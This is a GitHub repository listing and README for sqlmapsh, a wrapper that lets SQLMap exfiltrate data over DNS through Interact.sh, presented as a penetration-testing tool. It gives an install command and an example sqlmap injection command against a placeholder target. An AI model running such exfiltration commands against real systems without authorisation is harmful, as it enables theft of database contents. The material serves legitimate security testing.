https://github.com/unlock-security/sqlmapsh

SQLMap wrapper that lets you use Interact.sh as a DNS server for exfiltrating data with zero configuration
https://github.com/unlock-security/sqlmapsh

data-exfiltration detection dns-exfiltration exploitation golang interactsh oast oob pentesting pentesting-tool sqlmap

Last synced: 9 days ago
JSON representation

SQLMap wrapper that lets you use Interact.sh as a DNS server for exfiltrating data with zero configuration

• Host: GitHub
• URL: https://github.com/unlock-security/sqlmapsh
• Owner: unlock-security
• License: gpl-3.0
• Created: 2022-12-17T15:54:03.000Z (about 3 years ago)
• Default Branch: main
• Last Pushed: 2022-12-17T20:07:18.000Z (about 3 years ago)
• Last Synced: 2024-06-21T10:57:44.941Z (over 1 year ago)
• Topics: data-exfiltration, detection, dns-exfiltration, exploitation, golang, interactsh, oast, oob, pentesting, pentesting-tool, sqlmap
• Language: Go
• Homepage: https://www.unlock-security.it
• Size: 60.5 KB
• Stars: 30
• Watchers: 1
• Forks: 3
• Open Issues: 0
• Metadata Files:
  • Readme: README.md
  • License: LICENSE
  • Code of conduct: .github/CODE_OF_CONDUCT.md

Awesome Lists containing this project

README

          
![SQLMap.sh](./pics/sqlmapsh.png)

[![Go Report Card](https://goreportcard.com/badge/github.com/unlock-security/sqlmapsh?style=for-the-badge)](https://goreportcard.com/report/github.com/unlock-security/sqlmapsh)

[![License](https://img.shields.io/github/license/unlock-security/sqlmapsh?style=for-the-badge&label=License)](https://github.com/unlock-security/sqlmapsh?tab=GPL-3.0-1-ov-file#readme)

[![GitHub release (latest by date)](https://img.shields.io/github/v/release/unlock-security/sqlmapsh?style=for-the-badge)](https://github.com/unlock-security/sqlmapsh/releases/latest)

[![Made by 🔓 Unlock Security](https://img.shields.io/badge/Made_by-🔓_Unlock_Security-blue.svg?style=for-the-badge)](https://www.unlock-security.it/?utm_source=github&utm_medium=repo&utm_campaign=sqlmapsh)

SQLMap.sh is a SQLMap wrapper that lets you use Interact.sh as a DNS server for exfiltrating data with zero configuration.

To use the SQLMap `--dns-domain` flag you need to open your port 53 to the internet to let it run its own DNS server and you need a properly configured domain. This is not always possible during a penetration test engagement or maybe you just don't want to buy a domain for this.

SQLMap.sh solves this problem transparently. Just use it as if it is SQLMap and your are done to exfiltrate data via DNS.

## Installation

Run the following command to install the latest version.

```sh

go install github.com/unlock-security/sqlmapsh@latest

```

## Usage

Just replace `sqlmap` with `sudo sqlmapsh` when you want to use SQLMap with data exfiltration via DNS.

> [!IMPORTANT]

> SQLMap requires root privileges to perform data exfiltration via DNS because it needs to bind it's own DNS server locally on port 53

For example:

```sh

$ sqlmap -u 'https://www.target.com/page=1' -p page --level=5 --risk=3 --technique=E --banner

```

Become:

```sh

$ sudo sqlmapsh -u 'https://www.target.com/page=1' -p page --level=5 --risk=3 --technique=E --banner

```

---

Made with 💙 by Unlock Security